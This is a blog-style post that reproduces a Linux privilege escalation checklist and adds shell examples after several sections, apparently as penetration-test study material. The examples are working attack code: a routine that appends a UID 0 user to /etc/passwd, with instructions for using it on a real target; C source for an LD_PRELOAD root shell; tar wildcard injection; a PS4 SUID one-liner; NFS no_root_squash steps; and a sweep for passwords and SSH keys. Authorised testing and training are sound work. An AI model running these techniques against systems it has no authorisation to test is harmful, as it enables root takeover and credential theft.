Hi there, today I published a checklist of Linux privilege escalation strategies by Tib3rius.
- Linux Smart Enumeration (lse.sh)
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
see: ./lse.sh -h
- LinEnum
https://github.com/rebootuser/LinEnum
see: ./LinEnum.sh -h
- https://github.com/linted/linuxprivchecker
- https://github.com/AlessandroZ/BeRoot
- http://pentestmonkey.net/tools/audit/unix-privesc-check
1- Kernel Exploits (last choice: a failed kernel exploit can crash the machine)
- Ex. searchsploit linux kernel [kernel version] priv esc
- Ex. searchsploit linux kernel [kernel version] [Linux distribution] priv esc
- Or use Linux Exploit Suggester 2 with -k [kernel version]
2- Service Exploits
- ps aux | grep "^root" (processes running as root)
- Check the program version (--version or -v) and search for a matching exploit
- On Debian-like distributions: dpkg -l | grep [program]
- On rpm-based systems: rpm -qa | grep [program]
- netstat -an (or ss -tulpn) shows listening ports and current TCP/UDP connections; a service bound only to localhost can still be reached through port forwarding
3- Weak File Permissions
- Readable /etc/shadow (crack the root hash offline) or writable /etc/shadow (replace the root hash)
- Writable /etc/passwd (append a new UID 0 user with a known password hash in the second field)
- Backups of those files left readable
- Some common locations: / (root directory), /tmp and /var/backups
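The checks and the /etc/passwd abuse described above, as an added shell example that is not part of the original checklist. The demo at the bottom runs against a constructed copy of a passwd file, never the real one; the user name and password are placeholders.

```shell
# Added example (not from the original checklist): test the weak permissions
# this section lists and show what a writable /etc/passwd buys you. The demo
# at the bottom runs against a constructed copy so it never touches real files.

# Print one finding per line for the passwd/shadow pair given (defaults to the
# real files). Prints nothing when permissions are as they should be.
check_passwd_shadow() {
    passwd=${1:-/etc/passwd}
    shadow=${2:-/etc/shadow}
    [ -w "$passwd" ] && echo "WRITABLE $passwd: append a UID 0 user with a known hash"
    [ -r "$shadow" ] && echo "READABLE $shadow: crack the root hash offline"
    [ -w "$shadow" ] && echo "WRITABLE $shadow: replace the root hash directly"
    return 0
}

# crypt(3)-style MD5 hash with a fixed salt so the result is reproducible.
# Any hash format crypt() understands is accepted in the password field.
make_hash() {
    if command -v openssl >/dev/null 2>&1; then
        openssl passwd -1 -salt abcdefgh "$1"
    else
        # fallback when openssl is absent: glibc crypt() through perl
        perl -e 'print crypt($ARGV[0], q($1$abcdefgh$)), "\n"' -- "$1"
    fi
}

# Append a UID 0 user to a passwd-format file: $1 file, $2 name, $3 password.
# A hash in the second field means the shadow file is never consulted for
# this user. Log in afterwards with: su <name>
add_root_user() {
    hash=$(make_hash "$3") || return 1
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$2" "$hash" >> "$1"
}

# UID of a user in a passwd-format file (empty if the user is absent).
uid_of() {
    awk -F: -v u="$2" '$1 == u { print $3 }' "$1"
}

# Demo on a constructed copy (the real path would be /etc/passwd).
demo=$(mktemp)
printf 'root:x:0:0:root:/root:/bin/bash\nalice:x:1000:1000::/home/alice:/bin/bash\n' > "$demo"
check_passwd_shadow "$demo" /nonexistent   # WRITABLE, because we own the copy
add_root_user "$demo" newroot Password1
cat "$demo"                                # last line is the new UID 0 user
rm -f "$demo"
```

On a real target the only difference is the path: `add_root_user /etc/passwd newroot Password1` followed by `su newroot`. Some distributions ship a root-only /etc/shadow but a group-writable /etc/passwd by mistake; `check_passwd_shadow` with no arguments reports which case you are in.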
4- Sudo
- cat /etc/sudoers (usually root-only; sudo -l is the reliable way to see your own rules)
- sudo -l
- Known password: try the user's own password, or one found elsewhere on the box, with sudo
- https://gtfobins.github.io/ (shell escapes for binaries you are allowed to run with sudo)
- Abusing intended functionality (e.g. a sudo'd editor or pager can open /etc/shadow or spawn a shell)
- env_reset (the default: sudo strips the caller's environment, so the two entries below are the exceptions to look for in sudo -l)
- env_keep+=LD_PRELOAD (preload a shared object whose constructor spawns a root shell)
- env_keep+=LD_LIBRARY_PATH (drop a same-named copy of a library the sudo'd program loads into a directory you control)
- ldd [program] lists the shared libraries the program loads
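The sudo checks above, as an added shell example that is not part of the original checklist: it pulls the commands you may run and the env_keep entries out of `sudo -l` output, then writes the LD_PRELOAD payload. SAMPLE is constructed `sudo -l` output; `/usr/sbin/iftop` and `/usr/bin/find` are placeholder binaries.

```shell
# Added example (not from the original checklist): parse "sudo -l" output for
# the two things worth acting on, then write the LD_PRELOAD payload source.
# SAMPLE is constructed output; binaries and user are placeholders.

SAMPLE='Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) /usr/bin/find'

# Variables sudo passes through from your environment (one per line).
# LD_PRELOAD or LD_LIBRARY_PATH here means code execution as the target user.
sudo_env_keep() {
    printf '%s\n' "$1" | tr ',' '\n' \
      | sed -n 's/^[[:space:]]*env_keep+*=\(.*\)$/\1/p' \
      | tr -d '"' | tr ' ' '\n' | sed '/^$/d'
}

# Commands you may run, each prefixed with NOPASSWD or PASSWD.
# Look every one of them up on gtfobins.github.io.
sudo_allowed_cmds() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*\(/ {
            tag = ($0 ~ /NOPASSWD:/) ? "NOPASSWD" : "PASSWD"
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "")                         # drop "(root)"
            sub(/^((NOPASSWD|PASSWD|SETENV|NOEXEC):[ \t]*)+/, "")    # drop tags
            print tag, $0
        }'
}

# Write the shared object source to $1. Its constructor runs before main()
# of whatever sudo executes, drops LD_PRELOAD so the spawned shell does not
# re-trigger it, and hands over a root shell.
write_preload_src() {
    cat > "$1" <<'EOF'
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

__attribute__((constructor))
static void preload(void) {
    unsetenv("LD_PRELOAD");
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
EOF
}

# Demo against the constructed output.
echo "env_keep:";  sudo_env_keep "$SAMPLE"
echo "allowed:";   sudo_allowed_cmds "$SAMPLE"
write_preload_src /tmp/preload.c
# If LD_PRELOAD is kept (compile on the target, or on a host with the same libc):
#   gcc -fPIC -shared -o /tmp/preload.so /tmp/preload.c
#   sudo LD_PRELOAD=/tmp/preload.so /usr/sbin/iftop
# If LD_LIBRARY_PATH is kept instead: pick a library from "ldd /usr/sbin/iftop",
# build the same source as a .so with that library's name in /tmp, then
#   sudo LD_LIBRARY_PATH=/tmp /usr/sbin/iftop
```

The LD_LIBRARY_PATH variant only works for a library the program actually loads by name from the dynamic loader (not one it dlopen()s by absolute path), which is why the `ldd` step comes first.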
5- Cron Jobs
- User crontabs: /var/spool/cron/ or /var/spool/cron/crontabs/
- System-wide crontab: /etc/crontab (also /etc/cron.d/ and /etc/cron.{hourly,daily,weekly,monthly}/)
- Writable scripts: if the script a root cron job runs is writable by you, replace its contents
- PATH environment exploit: a cron job that calls a command by bare name resolves it through the crontab's PATH; a writable directory earlier in that PATH than the real command wins
- Wildcards & filenames: an unquoted * expands to the filenames in the directory, so files named like options (e.g. --checkpoint-action=exec=... for tar) are parsed as arguments
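Both cron weaknesses above, reproduced in a scratch directory as an added shell example that is not part of the original checklist. The "cron job" is a constructed script run by hand in place of cron; under a real root cron job the payloads would do something like `cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash` instead of printing or touching a file.

```shell
# Added example (not from the original checklist): the PATH hijack and the
# tar wildcard injection, in a temp dir, with a hand-run script standing in
# for cron. Everything below is constructed for the demo.

WORK=$(mktemp -d)

# 1. PATH hijack. The cron job calls "backup" by bare name and its PATH puts
#    a user-writable directory before the real one, so a same-named file in
#    that directory runs instead of the real tool.
demo_path_hijack() {
    mkdir -p "$WORK/home/user" "$WORK/bin"
    printf '#!/bin/sh\necho real-backup\n' > "$WORK/bin/backup"      # the real tool
    chmod +x "$WORK/bin/backup"
    # the cron job, as root would run it: PATH starts with the user's home
    printf '#!/bin/sh\nPATH=%s/home/user:%s/bin\nbackup\n' "$WORK" "$WORK" > "$WORK/cronjob.sh"
    printf '#!/bin/sh\necho hijacked\n' > "$WORK/home/user/backup"   # the payload
    chmod +x "$WORK/home/user/backup"
    sh "$WORK/cronjob.sh"                                             # prints "hijacked"
}

# 2. Wildcard injection. The cron job runs "tar -cf backup.tar *" inside a
#    directory we can write to. GNU tar accepts options after file operands,
#    so once * expands, files named like options are parsed as options.
demo_tar_wildcard() {
    if ! tar --version 2>/dev/null | grep -q GNU; then
        echo "skip: needs GNU tar"; return 0
    fi
    dir=$WORK/backup_me
    mkdir -p "$dir"
    (
        cd "$dir" || exit 1
        echo data > notes.txt
        printf '#!/bin/sh\ntouch %s/pwned\n' "$WORK" > shell.sh       # the payload
        # filenames that the wildcard turns into tar options
        touch -- '--checkpoint=1' '--checkpoint-action=exec=sh shell.sh'
        tar -cf "$WORK/backup.tar" *                                  # the cron job
    )
    [ -f "$WORK/pwned" ] && echo pwned
}

demo_path_hijack
demo_tar_wildcard
```

The same filename trick applies to other tools that take options after operands (rsync, chown, 7z); GTFOBins lists the option that gives execution for each. The defence on the cron side is the mirror image: quote or avoid wildcards, use absolute paths, and never put a user-writable directory in the crontab PATH.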
6- SUID / SGID Files
- find / -type f \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
- If an exploit script gives a "bad interpreter" error it has Windows line endings; fix them with sed -i -e 's/\r$//' exploit (or dos2unix exploit)
- strace shows shared libraries the binary tries and fails to load; if the missing path is in a directory you can write to, plant your own library there
- strace [SUID/SGID binary] 2>&1 | grep -iE "open|access|no such file"
- If /bin/sh is Bash < 4.2-048, exported shell functions may be named with an absolute path (function /usr/sbin/service() { ... }; export -f /usr/sbin/service) and override that program when the SUID binary calls it via system()
- If /bin/sh is Bash < 4.4, debugging can be forced through the environment so that PS4 runs a command: env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash)' /path/to/suid-binary
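The SUID enumeration and the strace step above, as an added shell example that is not part of the original checklist: the find with its escaping intact, a filter that hides binaries expected on a stock install, and a parser for the strace output the checklist greps by hand. The baseline list and STRACE_SAMPLE are constructed for this example; `/home/user/.config/libcalc.so` is a placeholder path.

```shell
# Added example (not from the original checklist): SUID/SGID enumeration
# helpers. BASELINE and STRACE_SAMPLE are constructed for the demo.

# Every SUID (4000) or SGID (2000) file on the system, long-listed.
find_suid() {
    find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null
}

# Drop paths that are normal on a stock install so custom binaries stand out.
# Reads one path per line on stdin. Short constructed baseline; extend it
# for the distribution you are on.
BASELINE=$(mktemp)
cat > "$BASELINE" <<'EOF'
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
EOF
unusual_suid() {
    grep -vxF -f "$BASELINE"
}

# From strace output on stdin, list shared objects the program tried to load
# and could not find (ENOENT). Each one is a candidate for planting our own.
missing_libs() {
    grep -E '^(open|openat|stat|access)\(.*ENOENT' \
      | sed -n 's/.*"\([^"]*\.so[^"]*\)".*/\1/p' | sort -u
}

# True if we could create a file at the given path: walk up to the nearest
# existing directory and check it is writable (a missing ~/.config/ counts,
# since we own the home directory above it).
can_plant() {
    p=$(dirname "$1")
    while [ ! -d "$p" ]; do p=$(dirname "$p"); done
    [ -w "$p" ]
}

STRACE_SAMPLE='openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)'

# Demo on constructed data. On a real target:
#   find_suid | awk '{print $NF}' | unusual_suid
#   strace -o /tmp/trace /path/to/suid-binary; missing_libs < /tmp/trace
# then build a .so whose constructor calls setuid(0) and runs /bin/bash -p,
# and place it at the missing path, e.g.
#   gcc -shared -fPIC -o /home/user/.config/libcalc.so libcalc.c
printf '/usr/bin/passwd\n/usr/local/bin/suid-so\n' | unusual_suid
printf '%s\n' "$STRACE_SAMPLE" | missing_libs | while read -r lib; do
    if can_plant "$lib"; then echo "PLANTABLE $lib"; else echo "missing $lib"; fi
done
```

Note that `missing_libs` only reports libraries the program asks for by a path that does not exist; a library found under a directory you can write to (the LD_LIBRARY_PATH case from the sudo section) shows up as a successful open and needs a separate look at the `ls -ld` of each directory in the trace.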
7- Passwords
- History files (.bash_history, .mysql_history and similar: commands typed with a password on the command line)
- Config files (database and application configs under /etc, /opt, /var/www)
- SSH keys (readable private keys in home directories; try them against root and against other hosts)
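A credential sweep over the three places named above, as an added shell example that is not part of the original checklist. It runs against a constructed directory tree so it can be tried anywhere; the file contents and the secrets in them are made up for the demo.

```shell
# Added example (not from the original checklist): sweep history files,
# config files and SSH keys for credentials. The tree under $T is constructed.

T=$(mktemp -d)
mkdir -p "$T/home/alice/.ssh" "$T/var/www/app/config"
printf 'ls -la\nmysql -u root -pS3cr3tDB\nexport DB_PASSWORD=hunter2\n' > "$T/home/alice/.bash_history"
printf 'db.host = localhost\ndb.password = Sup3rS3cret\n' > "$T/var/www/app/config/database.ini"
printf -- '-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed\n-----END OPENSSH PRIVATE KEY-----\n' \
    > "$T/home/alice/.ssh/id_ed25519"
chmod 644 "$T/home/alice/.ssh/id_ed25519"    # the mistake: key readable by everyone

# Lines that look like a credential assignment (key=value or key: value with a
# password-ish key) in any text file under $1. Point it at /etc, /home, /opt
# and /var/www on a target rather than / to stay out of /proc.
find_creds() {
    grep -rIHnEi -e '(passw(or)?d|secret|api[_-]?key|token)[[:space:]]*[=:][[:space:]]*[^[:space:]]' "$1" 2>/dev/null
}

# History lines where a password was given on the command line: -pSECRET,
# --password, anything mentioning passw, or user:pass@ inside a URL.
history_creds() {
    find "$1" -type f -name '.*history' \
        -exec grep -HnE -e '(-p[[:alnum:]]|--password|passw(or)?d|://[^/[:space:]]+:[^/[:space:]@]+@)' {} \; 2>/dev/null
}

# Private keys we can read: candidate names, confirmed by content so that
# public keys and unrelated .key files are skipped.
readable_keys() {
    find "$1" -type f \( -name 'id_*' -o -name '*.pem' -o -name '*.key' \) \
        -exec grep -l 'PRIVATE KEY' {} \; 2>/dev/null
}

echo "== config/history assignments"; find_creds "$T"
echo "== history command lines";      history_creds "$T"
echo "== readable private keys";      readable_keys "$T"
```

Each key found goes straight into `ssh -i <key> root@localhost` (and against any other host in the scope); each password goes into `su` and `sudo -l` for every user on the box, since reuse between service and system accounts is the common case.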
8- NFS
- no_root_squash in /etc/exports: root on a client keeps UID 0 on the share, so a SUID root binary can be planted on it and run on the target (showmount -e [target] lists the exports)
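The no_root_squash check, as an added shell example that is not part of the original checklist: it audits an exports file, prints the corrected lines, and spells out the exploit steps the option enables. EXPORTS_SAMPLE is a constructed /etc/exports; `target` and `/srv/share` are placeholders.

```shell
# Added example (not from the original checklist): find exports that disable
# root squashing and show the fix. EXPORTS_SAMPLE is constructed.

EXPORTS_SAMPLE=$(mktemp)
cat > "$EXPORTS_SAMPLE" <<'EOF'
# /etc/exports (constructed)
/srv/share      *(rw,sync,no_root_squash)
/home           10.0.0.0/24(rw,sync,root_squash)
EOF

# Print "share client" for every export whose client options disable root
# squashing. Comment lines are skipped; each client field is "host(opt,opt)".
nfs_root_squash_issues() {
    awk '!/^[ \t]*#/ && NF >= 2 {
        for (i = 2; i <= NF; i++)
            if ($i ~ /no_root_squash/) { split($i, c, "("); print $1, c[1] }
    }' "$1"
}

# The fix: map remote root to nobody. root_squash is also what you get when
# neither option is given, so simply deleting no_root_squash works too.
fix_exports() {
    sed 's/no_root_squash/root_squash/g' "$1"
}

nfs_root_squash_issues "$EXPORTS_SAMPLE"   # /srv/share *
fix_exports "$EXPORTS_SAMPLE"
# Exploit, once a no_root_squash export is found (needs root on the attacking
# machine; fails if the filesystem holding the share is mounted nosuid on the target):
#   on the target, as the low-privileged user:
#     cp /bin/bash /srv/share/rootbash
#   on the attacking machine:
#     mkdir -p /mnt/nfs && mount -o rw target:/srv/share /mnt/nfs
#     chown root:root /mnt/nfs/rootbash && chmod +xs /mnt/nfs/rootbash
#   back on the target:
#     /srv/share/rootbash -p
```

Copying the target's own /bin/bash onto the share, rather than uploading one from the attacking machine, avoids architecture and libc mismatches; with no_root_squash the client-side `chown root:root` is honoured as is, which is the whole problem.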
9- Check for services/ports listening inside the machine
- netstat -anop (or ss -tulpn); anything bound to 127.0.0.1 is only reachable through port forwarding
- Check your user (id, whoami).
- Run Linux Smart Enumeration with increasing levels (-l 0, then -l 1, then -l 2).
- Run LinEnum and the other scripts as well.
- If your scripts are failing and you don't know why, you can always run the manual commands from this course and other Linux PrivEsc cheatsheets online (e.g. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/).
- Spend some time reading over the results of your enumeration.
- If Linux Smart Enumeration level 0 or 1 finds something interesting, make a note of it.
- Avoid rabbit holes by creating a checklist of things you need for the privilege escalation method to work.
- Have a quick look around for files in your user's home directory and other common locations (e.g. /var/backups, /var/log). If your user has a history file, read it; it may contain important information like commands or even passwords.
- Try things that don't have many steps first, e.g. sudo, cron jobs, SUID files.
- Have a good look at root processes, enumerate their versions and search for exploits.
- Check for internal ports that you might be able to forward to your attacking machine.
- If you still don't have root, re-read your full enumeration dumps and highlight anything that seems odd. This might be a process or file name you aren't familiar with, an "unusual" filesystem configured (on Linux, anything that isn't ext, swap or tmpfs), or even a username. At this stage you can also start to think about kernel exploits.